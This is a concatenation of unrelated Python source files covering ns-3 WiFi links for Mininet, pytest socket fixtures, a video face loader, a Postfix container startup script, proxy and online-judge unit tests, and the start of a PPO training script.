"BeaconGeneration", ns.core.BooleanValue(True),
"BeaconInterval", ns.core.TimeValue(ns.core.Seconds(2.5)))
self.phyhelper.Set ("ChannelNumber", ns.core.UintegerValue (channelNumber))
return self.add( node, port, intfName, mode )
def addSta( self, node, port=None, intfName=None, mode=None, channelNumber=1, ssid="default-ssid" ):
"""Connect Mininet node to the segment.
Will create WifiNetDevice with StaWifiMac (client station).
Devices in that mode does not support SendFrom().
node: Mininet node
port: node port number (optional)
intfName: node tap interface name (optional)
mode: TapBridge mode (UseLocal or UseBridge) (optional)
ssid: network SSID (optional)"""
self.machelper.SetType ("ns3::StaWifiMac",
"Ssid", ns.wifi.SsidValue (ns.wifi.Ssid(ssid)),
"ScanType", ns.core.EnumValue (ns.wifi.StaWifiMac.ACTIVE))
self.phyhelper.Set ("ChannelNumber", ns.core.UintegerValue (channelNumber))
return self.add( node, port, intfName, mode )
class WIFIApStaLink( WIFISegment, Link ):
"""Link between two nodes using infrastructure WiFi channel."""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None, ssid="default-ssid" ):
"""Create infractructure WiFi link to another node, making two new tap interfaces.
node1: first Mininet node (access point)
node2: second Mininet node (client station)
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)
ssid: network SSID (optional)"""
WIFISegment.__init__( self )
intf1 = WIFISegment.addAp( self, node1, port1, intfName1, ssid=ssid )
intf2 = WIFISegment.addSta( self, node2, port2, intfName2, ssid=ssid )
intf1.link = self
intf2.link = self
self.intf1, self.intf2 = intf1, intf2
# WIFIBridgeLink uses WDSWifiMac mode, which (as for now) is not a part of ns-3 official release. You can add
# it to ns-3 using this patch: http://gist.github.com/piotrjurkiewicz/6483675
# With the infrastructure mode it is posiible to connect hosts (Sta devices) with switches (Ap devices).
# However, you can't connect two switches (two Distribution Systems). In order to do that, you must use all
# four address fields in 802.11 frame. Such mode is called WDS mode or 4-address mode (4A) or even bridge mode.
class WIFIBridgeLink( WIFISegment, Link ):
"""Link between two nodes using WDS WiFi channel.
This link bridges two distribution systems, so two
switches can be connected on the both sides of link."""
def __init__( self, node1, node2, port1=None, port2=None,
intfName1=None, intfName2=None ):
"""Create WDS bridge, making two new tap interfaces.
node1: first Mininet node
node2: second Mininet node
port1: node1 port number (optional)
port2: node2 port number (optional)
intfName1: node1 interface name (optional)
intfName2: node2 interface name (optional)"""
WIFISegment.__init__( self )
# It this case the order of TBIntf and ns-3 device creation is reversed:
# TBIntfs (and thus tap interfaces) are created before ns-3 WifiNetDevices.
# Tap interfaces must be created earlier, becauses Mac addresses of the paired
# node must be provided when setting WDSWifiMac.
# NODE 1
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node1, 'nsNode' ) and node1.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node1.nsNode = ns.network.Node()
allNodes.append( node1 )
mobilityhelper1 = ns.mobility.MobilityHelper()
# Install mobility object to the ns-3 node.
mobilityhelper1.Install( node1.nsNode )
# If port number is not specified...
if port1 is None:
# ...obtain it automatically.
port1 = node1.newPort()
# If interface name is not specified...
if intfName1 is None:
# ...obtain it automatically.
intfName1 = node1.name + '-eth' + repr( port1 )
# ns-3 device is not specified in the following call, so nsInstall() will nor occur automatically.
tb1 = TBIntf( intfName1, node1, port1, node1.nsNode )
# NODE 2
# Check if this Mininet node has assigned an underlying ns-3 node.
if hasattr( node2, 'nsNode' ) and node2.nsNode is not None:
# If it is assigned, go ahead.
pass
else:
# If not, create new ns-3 node and assign it to this Mininet node.
node2.nsNode = ns.network.Node()
allNodes.append( node2 )
mobilityhelper2 = ns.mobility.MobilityHelper()
# Install mobility object to the ns-3 node.
mobilityhelper2.Install( node2.nsNode )
# If port number is not specified...
if port2 is None:
# ...obtain it automatically.
port2 = node2.newPort()
# If interface name is not specified...
if intfName2 is None:
# ...obtain it automatically.
intfName2 = node2.name + '-eth' + repr( port2 )
# ns-3 device is not specified in the following call, so nsInstall() will nor occur automatically.
tb2 = TBIntf( intfName2, node2, port2, node2.nsNode )
# NODE 1
# Set Mac type and paired device Mac address for the node 1.
self.machelper.SetType ("ns3::WDSWifiMac",
"ReceiverAddress", ns.network.Mac48AddressValue( ns.network.Mac48Address( tb2.MAC() ) ) )
# Create and install WifiNetDevice.
device1 = self.wifihelper.Install( self.phyhelper, self.machelper, node1.nsNode ).Get( 0 )
# Set nsDevice in TapBridge the the created one.
tb1.nsDevice = device1
# Install TapBridge to the ns-3 node.
tb1.nsInstall()
# NODE 2
# Set Mac type and paired device Mac address for the node 2.
self.machelper.SetType ("ns3::WDSWifiMac",
"ReceiverAddress", ns.network.Mac48AddressValue( ns.network.Mac48Address( tb1.MAC() ) ) )
# Create and install WifiNetDevice.
device2 = self.wifihelper.Install( self.phyhelper, self.machelper, node2.nsNode ).Get( 0 )
# Set nsDevice in TapBridge the the created one.
tb2.nsDevice = device2
# Install TapBridge to the ns-3 node.
tb2.nsInstall()
#
tb1.link = self
tb2.link = self
self.intf1, self.intf2 = tb1, tb2
|
conftest.py
|
import socket
from threading import Thread
from typing import Tuple
import pytest
from google.protobuf.message import Message
from singa import tensor
from src.client.app import Client
from src.proto import interface_pb2
from src.proto.utils import serialize_tensor
from src.server.app import Server
@pytest.fixture(scope="module")
def server_client() -> Tuple[socket.socket, socket.socket]:
HOST = "127.0.0.1"
PORT = 1234
s = socket.socket()
s.bind((HOST, PORT))
s.listen()
c = socket.socket()
c.connect((HOST, PORT))
s = s.accept()[0]
yield (s, c)
c.shutdown(0)
s.shutdown(0)
@pytest.fixture
def protobuf() -> Message:
p = interface_pb2.WeightsExchange()
p.op_type = interface_pb2.DEFAULT
p.weights["x"] = "placeholder message".encode("utf-8")
p.weights["y"] = serialize_tensor(tensor.random((3, 3)))
return p
@pytest.fixture(scope="module")
def server_client_single() -> Tuple[Server, Client]:
server = Server(num_clients=1)
client = Client(global_rank=0)
thread_s = Thread(target=server.start)
thread_s.start()
thread_c = Thread(target=client.start)
thread_c.start()
thread_s.join()
thread_c.join()
yield (server, client)
client.close()
server.close()
@pytest.fixture(scope="module")
def server_client_single() -> Tuple[Server, Client]:
server = Server(num_clients=1)
client = Client(global_rank=0)
thread_s = Thread(target=server.start)
thread_s.start()
thread_c = Thread(target=client.start)
thread_c.start()
thread_s.join()
thread_c.join()
yield (server, client)
client.close()
server.close()
|
Video_age.py
|
import cv2
import threading
import numpy as np
class VideoLoader(object):
""" Generator of face images in the video
Invoke an additional thread to load the video frames in the file and generate the cropped faces of the same size
Attributes
----------
path : Path
Path to the video file
video : cv2.VideoCapture
Video file loader
fd_rst : list of tuple of (int, dict of {str : float})
Face detection results, each item in the list is a tuple of two elements. The first element is the frame ID
and the second element is face detection results :class:`dict` with min_x, min_y, width, height, and confidence
target_size : tuple of (int, int)
The tuple has two element: (height, width), which represents the size of output face images
cache_size : int
Size of the frame pre-loading cache, unit: number of frames
batch_size : int
Batch size of the output of each iteration, i.e., number of faces in the batch
cache : None or dict of {int : np.ndarray}
Pre-loaded video frames mapping frame ID to the frames. None if has not :func:`reset`
last_face_loaded : None or int
Index of :attr:`fd_rst` corresponds to the last pre-loaded frame. None if has not :func:`reset`
num_face_generated : None or int
Index of :attr:`fd_rst`, number of faces has been generated. None if has not :func:`reset`
all_cached : bool
Whether all the frames needed to generate face images are loaded in memory
process : threading.Thread
The thread to pre-load frames from video file
cache_write_lock : threading.Lock
The lock preventing concurrent write attempt to the :attr:`cache`
"""
def __init__(self, video_path, fd_rst, age_rst, target_size, batch_size, frame_cache_size):
self.path = video_path
self.video = cv2.VideoCapture(str(video_path))
self.cache_size = frame_cache_size
self.batch_size = batch_size
self.fd_rst = list()
for frame_id, faces in fd_rst.items():
for face in faces:
self.fd_rst.append((frame_id, face))
self.age_rst = age_rst
self.target_size = target_size
self.cache = None
self.num_face_generated = None
self.last_face_loaded = None
self.all_cached = True
self.process = threading.Thread(target=self._preload_frames)
self.cache_write_lock = threading.Lock()
def __iter__(self):
self.reset()
return self
def __len__(self):
return np.ceil(len(self.fd_rst) / self.batch_size)
def __next__(self):
if self.num_face_generated == len(self.fd_rst):
raise StopIteration
else:
# Generate the next batch of face images
img_batch = list()
video_frame_batch = list()
meta_batch = list()
while len(img_batch) != self.batch_size and self.num_face_generated != len(self.fd_rst):
# Wait for new frame to be loaded
face_meta = self.fd_rst[self.num_face_generated]
frame_id = face_meta[0]
while not self.all_cached and frame_id not in self.cache.keys():
pass
# Filter non child faces
if int(frame_id) not in self.age_rst:
self.num_face_generated += 1
if self.num_face_generated == len(self.fd_rst) or self.fd_rst[self.num_face_generated][0] != frame_id:
self.cache.pop(frame_id)
continue
# Load the next image
frame = self.cache[frame_id]
min_x = max(0, int(round(face_meta[1]['min_x'], 0)))
min_y = max(0, int(round(face_meta[1]['min_y'], 0)))
width = min(frame.shape[1]-min_x, int(round(face_meta[1]['width'], 0)))
height = min(frame.shape[0]-min_y, int(round(face_meta[1]['height'], 0)))
face = frame[min_y:min_y+height, min_x:min_x+width, :]
face = self._resize_face(face)
img_batch.append(face)
meta_batch.append(face_meta)
# Zoom out the face for iMotion Expression detection
center_x = min_x + width / 2
center_y = min_y + height / 2
half_target_size = max(width, height)
space_x_left = center_x - half_target_size
space_x_right = frame.shape[1] - center_x - half_target_size
space_y_top = center_y - half_target_size
space_y_bot = frame.shape[0] - center_y - half_target_size
if space_x_left + space_x_right >= 0:
if space_x_left < 0:
space_x_right += space_x_left
space_x_left = 0
if space_x_right < 0:
space_x_left += space_x_right
space_x_right = 0
else:
diff = abs(space_x_left + space_x_right)
space_y_top += diff / 2
space_y_bot += diff / 2
space_x_left = 0
space_x_right = 0
if space_y_top + space_y_bot >= 0:
if space_y_top < 0:
space_y_bot += space_y_top
space_y_top = 0
if space_y_bot < 0:
space_y_top += space_y_bot
space_y_bot = 0
else:
diff = abs(space_y_top + space_y_bot)
space_x_left += diff / 2
space_x_right += diff / 2
space_y_top = 0
space_y_bot = 0
space_x_left = int(round(space_x_left, 0))
space_x_right = int(round(space_x_right, 0))
space_y_top = int(round(space_y_top, 0))
space_y_bot = int(round(space_y_bot, 0))
#print(space_x_left, space_x_right, space_y_top, space_y_bot, frame.shape[1], frame.shape[0])
#print(space_x_left, frame.shape[1]-space_x_right, space_y_top, frame.shape[0]-space_y_bot)
video_frame = frame[space_y_top:(frame.shape[0]-space_y_bot), space_x_left:(frame.shape[1]-space_x_right), :]
#print(frame.shape, video_frame.shape)
video_frame = self._resize_face(video_frame)
video_frame_batch.append(frame)#video_frame)
# Update status
self.num_face_generated += 1
if self.num_face_generated == len(self.fd_rst) or self.fd_rst[self.num_face_generated][0] != frame_id:
self.cache.pop(frame_id)
print('{}: {} faces have been generated'.format(self.path.stem, self.num_face_generated))
return np.array(img_batch), meta_batch, np.array(video_frame_batch)
@property
def num_frame_in_cache(self):
return len(self.cache)
def _preload_frames(self):
""" Pre-load video frames
Load frames from :attr:`self.video` and store into :attr:`self.cache`.
This function will be executed by :attr:`self.process`
Raises
------
IOError
Cannot retrieve a needed frame from the video file
"""
while not self.all_cached:
if self.num_frame_in_cache < self.cache_size:
if self._load_next_frame():
self.all_cached = True
def _load_next_frame(self):
""" Load a single frame
Load the next unloaded frame needed for face image generation from :attr:`self.video`
and store into :attr:`self.cache`
Returns
-------
hitting_end : bool
Whether all the required video frames are loaded
Raises
------
IOError
Cannot retrieve a needed frame from the video file
"""
# Determine which frame to load
face_to_load = self.last_face_loaded + 1
if self.last_face_loaded != -1:
if face_to_load == len(self.fd_rst):
return True
while self.fd_rst[face_to_load][0] == self.fd_rst[self.last_face_loaded][0]:
face_to_load += 1
if face_to_load == len(self.fd_rst):
return True
# Load the frame
frame_to_load = self.fd_rst[face_to_load][0]
with self.cache_write_lock:
self.video.set(cv2.CAP_PROP_POS_FRAMES, int(frame_to_load))
ret, frame = self.video.read()
if ret:
self.cache[frame_to_load] = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
self.last_face_loaded = face_to_load
return False
else:
# TODO: Handle the error
#raise IOError('Fail to load the frame {} in the video'.format(face_to_load))
self.last_face_loaded = face_to_load
print(IOError('Fail to load the frame {} in the video'.format(face_to_load)))
def _resize_face(self, face_img):
""" Resize the face image to the target size
Parameters
----------
face_img: np.ndarray
Face image to be resized
Returns
-------
resized_img : np.ndarray
Resized face image
"""
return cv2.resize(face_img, self.target_size)
def reset(self):
""" Reset the face image generator and ready to generate images based on the current configuration """
with self.cache_write_lock:
# Attempt to terminate the previous pre-loading process gracefully
self.all_cached = True
if self.process.is_alive():
del self.process
# Re-initiate the generator
self.cache = dict()
self.last_face_loaded = -1 # Indicate to load the first required frame
self.num_face_generated = 0
self.all_cached = False
# Restart the pre-loading
self.process = threading.Thread(target=self._preload_frames)
self.process.start()
|
run.py
|
#!/usr/local/bin/python3
#
## bootstrap to serve local files and run the api server
#
import http.server, socketserver, threading
# TODO: this flask app is pointing to test, once API server is completed, change this line:
from api import api as apiServer
API_PORT = 8002
HTTP_PORT = 8001
def run():
try:
httpd = socketserver.TCPServer(('0.0.0.0', HTTP_PORT), http.server.SimpleHTTPRequestHandler)
httpd_thread = threading.Thread(target=httpd.serve_forever)
httpd_thread.daemon = True
httpd_thread.start()
print('[+] HTTP Server running on port '+str(HTTP_PORT)+"...")
apiServer.initDB()
apiServer.app.config['ENV'] = 'development'
apiServer.app.run(host='0.0.0.0',port=API_PORT)
except KeyboardInterrupt:
print('[+] Shutting down')
httpd_thread.stop()
exit(0)
run()
exit(0)
|
start.py
|
#!/usr/bin/python3
import os
import glob
import shutil
import multiprocessing
import logging as log
import sys
from podop import run_server
from pwd import getpwnam
from socrate import system, conf
log.basicConfig(stream=sys.stderr, level=os.environ.get("LOG_LEVEL", "WARNING"))
def start_podop():
os.setuid(getpwnam('postfix').pw_uid)
os.mkdir('/dev/shm/postfix',mode=0o700)
url = "http://" + os.environ["ADMIN_ADDRESS"] + "/internal/postfix/"
# TODO: Remove verbosity setting from Podop?
run_server(0, "postfix", "/tmp/podop.socket", [
("transport", "url", url + "transport/§"),
("alias", "url", url + "alias/§"),
("dane", "url", url + "dane/§"),
("domain", "url", url + "domain/§"),
("mailbox", "url", url + "mailbox/§"),
("recipientmap", "url", url + "recipient/map/§"),
("sendermap", "url", url + "sender/map/§"),
("senderaccess", "url", url + "sender/access/§"),
("senderlogin", "url", url + "sender/login/§"),
("senderrate", "url", url + "sender/rate/§")
])
def start_mta_sts_daemon():
os.chmod("/root/", 0o755) # read access to /root/.netrc required
os.setuid(getpwnam('postfix').pw_uid)
from postfix_mta_sts_resolver import daemon
daemon.main()
def is_valid_postconf_line(line):
return not line.startswith("#") \
and not line == ''
# Actual startup script
os.environ["FRONT_ADDRESS"] = system.get_host_address_from_environment("FRONT", "front")
os.environ["ADMIN_ADDRESS"] = system.get_host_address_from_environment("ADMIN", "admin")
os.environ["ANTISPAM_MILTER_ADDRESS"] = system.get_host_address_from_environment("ANTISPAM_MILTER", "antispam:11332")
os.environ["LMTP_ADDRESS"] = system.get_host_address_from_environment("LMTP", "imap:2525")
for postfix_file in glob.glob("/conf/*.cf"):
conf.jinja(postfix_file, os.environ, os.path.join("/etc/postfix", os.path.basename(postfix_file)))
if os.path.exists("/overrides/postfix.cf"):
for line in open("/overrides/postfix.cf").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -e "{}"'.format(line))
if os.path.exists("/overrides/postfix.master"):
for line in open("/overrides/postfix.master").read().strip().split("\n"):
if is_valid_postconf_line(line):
os.system('postconf -Me "{}"'.format(line))
for map_file in glob.glob("/overrides/*.map"):
destination = os.path.join("/etc/postfix", os.path.basename(map_file))
shutil.copyfile(map_file, destination)
os.system("postmap {}".format(destination))
os.remove(destination)
if os.path.exists("/overrides/mta-sts-daemon.yml"):
shutil.copyfile("/overrides/mta-sts-daemon.yml", "/etc/mta-sts-daemon.yml")
else:
conf.jinja("/conf/mta-sts-daemon.yml", os.environ, "/etc/mta-sts-daemon.yml")
if not os.path.exists("/etc/postfix/tls_policy.map.lmdb"):
open("/etc/postfix/tls_policy.map", "a").close()
os.system("postmap /etc/postfix/tls_policy.map")
if "RELAYUSER" in os.environ:
path = "/etc/postfix/sasl_passwd"
conf.jinja("/conf/sasl_passwd", os.environ, path)
os.system("postmap {}".format(path))
# Run Podop and Postfix
multiprocessing.Process(target=start_podop).start()
multiprocessing.Process(target=start_mta_sts_daemon).start()
os.system("/usr/libexec/postfix/post-install meta_directory=/etc/postfix create-missing")
# Before starting postfix, we need to check permissions on /queue
# in the event that postfix,postdrop id have changed
os.system("postfix set-permissions")
os.system("postfix start-fg")
|
mp_process01.py
|
## how to affect the results when start() and join() in different location.
from multiprocessing import Process
import os
# child process
def run_proc(name):
print('Run child process %s (%s)...' % (name, os.getpid()))
if __name__=='__main__':
print('Parent process %s.' % os.getpid())
p = Process(target=run_proc, args=('test',)) # create a child process
#p.start()
#p.join()
print('Child process will start.')
p.start()
p.join()
print('Child process end.')
|
data.py
|
from __future__ import print_function
import threading
import time
from phi.physics.field.staggered_grid import StaggeredGrid
from .stream import DerivedStream
class Interleave(DerivedStream):
def __init__(self, fields):
DerivedStream.__init__(self, fields)
self.field_count = len(fields)
def shape(self, datasource):
return self.input_fields[0].shape(datasource)
def size(self, datasource):
return sum([f.size(datasource) for f in self.input_fields])
def get(self, datasource, indices):
for index in indices:
yield self.input_fields[index % self.field_count].get(datasource, index // self.field_count)
class Transform(DerivedStream):
def __init__(self, transformation, field):
DerivedStream.__init__(self, [field])
self.field = self.input_fields[0]
self.transformation = transformation
def shape(self, datasource):
return self.field.shape(datasource)
def size(self, datasource):
return self.field.size(datasource)
def get(self, datasource, indices):
for index in indices:
yield self.transformation(self.field.get(datasource, index))
class AsyncBatchIterator(BatchIterator):
def __init__(self, batch_iterator, logf=None):
# type: (BatchIterator, function) -> AsyncBatchIterator
BatchIterator.__init__(self, batch_iterator.database, batch_iterator.dataset, batch_iterator.iterator_generator, cache=False)
self.it = batch_iterator
self.batches = []
self.batch_ready = threading.Event()
self.progressed = threading.Event()
self.alive = True
self.logf = logf
threading.Thread(target=self.next_loop).start()
def get_batch(self, streams=None, subrange=None):
self.batch_ready.wait()
# print("Retrieving batch %d" % self.index)
if not self.batches:
raise RuntimeError("get_batch failed in AsyncBatchIterator")
return self.batches[0]
def progress(self):
BatchIterator.progress(self)
# print("Progress to batch %d" % self.index)
del self.batches[0]
if not self.batches:
self.batch_ready.clear()
self.progressed.set()
def next_loop(self):
while self.alive:
while len(self.batches) < 2:
time_before = time.time()
self.batches.append(self.it.get_batch())
duration = time.time() - time_before
self.logf and self.logf("Retrieving batch %d took %f seconds." % (self.it.index, duration))
self.batch_ready.set()
self.it.progress()
self.progressed.wait()
self.progressed.clear()
def __del__(self):
self.alive = False
|
proxy_creation_test.py
|
import queue
from abc import ABC, abstractmethod
from threading import Thread
from time import sleep
from typing import Any, Dict, List, Tuple, cast
from unittest import TestCase
from puma.attribute import ProcessAction, ThreadAction, manually_managed
from puma.attribute.mixin import ScopedAttributesCompatibilityMixin
from puma.buffer import Buffer, MultiThreadBuffer
from puma.helpers.testing.logging.capture_logs import CaptureLogs
from puma.logging import LogLevel
from puma.runnable.proxy import Proxy
from puma.runnable.remote_execution import BaseRemoteObjectReference
from tests.runnable.proxy.proxy_test_helpers import AllMethodsReturnNone, CallResponse, HasMethodThatReturnsValue, Parent, ParentImpl, SendsCallsToBufferImpl
class ProxyCreationTest(TestCase):
def test_ensure_an_error_raised_if_proxy_used_without_context_management(self) -> None:
proxy = Proxy(AllMethodsReturnNone, None)
with self.assertRaisesRegex(RuntimeError, "Must be context managed"):
proxy.get_runner()
with self.assertRaisesRegex(RuntimeError, "Must be context managed"):
proxy.get_facade()
def test_no_error_raised_if_interface_has_only_methods_that_return_none(self) -> None:
with MultiThreadBuffer[CallResponse](10, "Test Buffer") as feedback_buffer:
real_impl = SendsCallsToBufferImpl(feedback_buffer)
with Proxy(AllMethodsReturnNone, real_impl) as proxy_1:
proxy_1.get_facade()
with Proxy(PartialProxyThatImplementsMethodWithReturnValue, real_impl) as proxy_2:
proxy_2.get_facade()
def test_error_raised_if_incorrect_arguments_given(self) -> None:
with MultiThreadBuffer[CallResponse](10, "Test Buffer") as feedback_buffer:
real_impl = SendsCallsToBufferImpl(feedback_buffer)
with Proxy(AllMethodsReturnNone, real_impl) as proxy:
facade = proxy.get_facade()
with self.assertRaisesRegex(TypeError, "too many positional arguments"):
facade.no_args("an arg") # type: ignore
with self.assertRaisesRegex(TypeError, "missing a required argument: 'a'"):
facade.one_arg() # type: ignore
with self.assertRaisesRegex(TypeError, "too many positional arguments"):
facade.one_arg("one", "two") # type: ignore
with self.assertRaisesRegex(TypeError, "missing a required argument: 'a'"):
facade.two_args() # type: ignore
with self.assertRaisesRegex(TypeError, "missing a required argument: 'b'"):
facade.two_args("one") # type: ignore
with self.assertRaisesRegex(TypeError, "too many positional arguments"):
facade.two_args("one", "two", "three") # type: ignore
def test_ensure_accidentally_un_decorated_methods_work_as_expected(self) -> None:
all_call_recorder = MethodCallRecorder(["decorated_method"])
with Proxy(InterfaceWithOneMissingDecorator, cast(InterfaceWithOneMissingDecorator, all_call_recorder)) as proxy, \
proxy.get_runner() as proxy_runner:
facade = proxy.get_facade()
proxy_runner.start_blocking()
# Ensure calling decorated_method doesn't raise an error
facade.decorated_method()
with self.assertRaisesRegex(NotImplementedError, "Ooops, undecorated_method wasn't decorated"):
facade.undecorated_method()
# Ensure that only a call to decorated_method was requested
commands: CallLog = all_call_recorder._call_log
self.assertEqual(1, len(commands))
self.assertEqual(commands["decorated_method"], ((), {}))
def test_ensure_accidentally_un_decorated_methods_work_as_expected_in_extended_interfaces(self) -> None:
all_call_recorder = MethodCallRecorder(["decorated_method", "decorated_extended"])
with Proxy(ExtendedInterfaceWithMissingDecorator, cast(ExtendedInterfaceWithMissingDecorator, all_call_recorder)) as proxy, \
proxy.get_runner() as proxy_runner:
facade = proxy.get_facade()
proxy_runner.start_blocking()
# Ensure calling decorated_method doesn't raise an error
facade.decorated_method()
facade.decorated_extended()
with self.assertRaisesRegex(NotImplementedError, "Ooops, undecorated_method wasn't decorated"):
facade.undecorated_method()
with self.assertRaisesRegex(NotImplementedError, "Ooops, undecorated_extended wasn't decorated"):
facade.undecorated_extended()
# Ensure that only a call to decorated_method was requested
commands: CallLog = all_call_recorder._call_log
self.assertEqual(2, len(commands))
self.assertEqual(commands["decorated_method"], ((), {}))
self.assertEqual(commands["decorated_extended"], ((), {}))
def test_proxy_erroneously_passed_to_thread_shows_warning(self) -> None:
with Proxy(Parent, ParentImpl()) as proxy, \
proxy.get_runner() as proxy_runner:
facade = proxy.get_facade()
proxy_runner.start_blocking()
with CaptureLogs() as log_context:
# Retrieve a proxy of SubObject
sub_object = facade.get_sub_object()
# Ensure its initial state is correct
self.assertEqual("Initial State", sub_object.get_attribute())
# Update it's state and check that it stuck
sub_object.set_attribute("Outer Thread State")
self.assertEqual("Outer Thread State", sub_object.get_attribute())
# Now, erroneously pass this Proxy object to another thread
def thread_method() -> None:
# Call again in background thread. In this instance this raises an error but other side effects could occur depending on the type of the object being proxied
with self.assertRaisesRegex(AttributeError, "AutoRemoteObjectReference' object has no attribute '_attribute'"):
sub_object.get_attribute()
# Start the thread which now erroneously has a Proxy object
thread = Thread(target=thread_method)
thread.start()
thread.join()
# Ensure outer object hasn't changed
self.assertEqual("Outer Thread State", sub_object.get_attribute())
# Ensure that the expected warnings were shown
warning_logs = log_context.pop_captured_records().with_levels_in({LogLevel.warn}).get_lines(timestamp=False, level=False)
self.assertEqual(2, len(warning_logs)) # 2 warnings, as they were raised for both "get_attribute" and "_attribute"
def expected_log_message(attribute: str) -> str:
return f"No remote methods or attributes found for AutoRemoteObjectReference for <class 'tests.runnable.proxy.proxy_test_helpers.SubObjectImpl'> " \
f"when attempting to retrieve '{attribute}' - has it been incorrectly shared across threads?"
self.assertEqual(expected_log_message("get_attribute"), warning_logs[0])
self.assertEqual(expected_log_message("_attribute"), warning_logs[1])
def get_all_items_from_buffer(buffer: Buffer) -> List:
buffer_items = []
with buffer.subscribe(None) as sub:
while True:
try:
sleep(0.01)
sub.call_events(lambda v: buffer_items.append(v))
except queue.Empty:
break
return buffer_items
CallLog = Dict[str, Tuple[Any, Any]]
class MethodCallRecorder(ScopedAttributesCompatibilityMixin):
_call_log: CallLog = manually_managed("_call_log", ThreadAction.SHARED, ProcessAction.NOT_ALLOWED)
def __init__(self, methods_to_record: List[str]) -> None:
super().__init__()
self._methods_to_record = methods_to_record
self._call_log = {}
def __getattribute__(self, item: str) -> Any:
methods_to_record = super().__getattribute__("_methods_to_record")
if item in methods_to_record:
return CallRecorder(self._call_log, item)
return super().__getattribute__(item)
class CallRecorder:
def __init__(self, recording_dict: CallLog, name: str):
self._recording_dict = recording_dict
self._name = name
def __call__(self, *args: Any, **kwargs: Any) -> Any:
self._recording_dict[self._name] = (args, kwargs)
class PartialProxyThatImplementsMethodWithReturnValue(BaseRemoteObjectReference[HasMethodThatReturnsValue], HasMethodThatReturnsValue, ABC):
def returns_value(self, a: str, b: int) -> str:
return self._remote_method(self._wrapped_instance.returns_value).call(a, b)
class InterfaceWithOneMissingDecorator(ABC):
@abstractmethod
def decorated_method(self) -> None:
raise NotImplementedError
def undecorated_method(self) -> None:
raise NotImplementedError("Ooops, undecorated_method wasn't decorated")
class ExtendedInterfaceWithMissingDecorator(InterfaceWithOneMissingDecorator, ABC):
@abstractmethod
def decorated_extended(self) -> None:
raise NotImplementedError()
def undecorated_extended(self) -> None:
raise NotImplementedError("Ooops, undecorated_extended wasn't decorated")
|
tests.py
|
from oj.server import judge, main
import threading
import time
import subprocess
import unittest
import xmlrpc.client
PORT = 8000
class ProductTestCase(unittest.TestCase):
def test_CE(self):
self.assertEqual(judge('', [], 0), 'CE')
def test_AC(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 1', '1')])[0], ['AC'])
def test_WA(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('2 2', '4')])[0], ['WA'])
def test_TLE(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n while (true)\n ;\n return 0;\n}\n', [('1 1', '1')], .1), (['TLE'], [100]))
def test_RE(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 0', '0')])[0], ['RE'])
def test_case(self):
self.assertEqual(judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 1', '1'), ('2 2', '4'), ('1 0', '0')])[0], ['AC', 'WA', 'RE'])
def test_threading(self):
t = time.time()
judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n while (true)\n ;\n return 0;\n}\n', [('1 1', '1')] * 10, .1)
self.assertAlmostEqual(time.time() - t, .1, 0)
def test_server(self):
threading.Thread(target=main, kwargs={'port': PORT, 'quiet': True}, daemon=True).start()
time.sleep(.1)
self.assertEqual(xmlrpc.client.ServerProxy('http://127.0.0.1:' + str(PORT)).judge('#include <cstdio>\nint main() {\n int a, b;\n scanf("%d %d", &a, &b);\n printf("%d", a / b);\n return 0;\n}\n', [('1 1', '1')])[0], ['AC'])
def test_with_pylint(self):
pylint = subprocess.run(['pylint', '-sn', 'oj.server'], stdout=subprocess.PIPE).stdout.decode()
self.assertFalse(pylint, '\n' + pylint)
if __name__ == '__main__':
unittest.main()
|
ppo_continuous_multiprocess.py
|
'''
Multi-processing for PPO continuous version 1
'''
import math
import random
import gym
import numpy as np
import torch
torch.multiprocessing.set_start_method('forkserver', force=True) # critical for make multiprocessing work
import torch.nn as nn
import torch.optim as optim
import torch.nn.functional as F
from torch.distributions import Normal, MultivariateNormal
from IPython.display import clear_output
import matplotlib.pyplot as plt
from matplotlib import animation
from IPython.display import display
from reacher import Reacher
import argparse
import time
import torch.multiprocessing as mp
from torch.multiprocessing import Process
from multiprocessing import Process, Manager
from multiprocessing.managers import BaseManager
import threading as td
GPU = True
device_idx = 0
if GPU:
device = torch.device("cuda:" + str(device_idx) if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(device)
parser = argparse.ArgumentParser(description='Train or test neural net motor controller.')
parser.add_argument('--train', dest='train', action='store_true', default=False)
parser.add_argument('--test', dest='test', action='store_true', default=False)
args = parser.parse_args()
##################### hyper parameters ####################
ENV_NAME = 'Pendulum-v0' # environment name
RANDOMSEED = 2 # random seed
EP_MAX = 1000 # total number of episodes for training
EP_LEN = 200 # total number of steps for each episode
GAMMA = 0.9 # reward discount
A_LR = 0.0001 # learning rate for actor
C_LR = 0.0002 # learning rate for critic
BATCH = 128 # update batchsize
A_UPDATE_STEPS = 10 # actor update steps
C_UPDATE_STEPS = 10 # critic update steps
EPS = 1e-8 # numerical residual
MODEL_PATH = 'model/ppo_multi'
NUM_WORKERS=2 # or: mp.cpu_count()
ACTION_RANGE = 1. # if unnormalized, normalized action range should be 1.
METHOD = [
dict(name='kl_pen', kl_target=0.01, lam=0.5), # KL penalty
dict(name='clip', epsilon=0.2), # Clipped surrogate objective, find this is better
][0] # choose the method for optimization
############################### PPO ####################################
class AddBias(nn.Module):
def __init__(self, bias):
super(AddBias, self).__init__()
self._bias = nn.Parameter(bias.unsqueeze(1))
def forward(self, x):
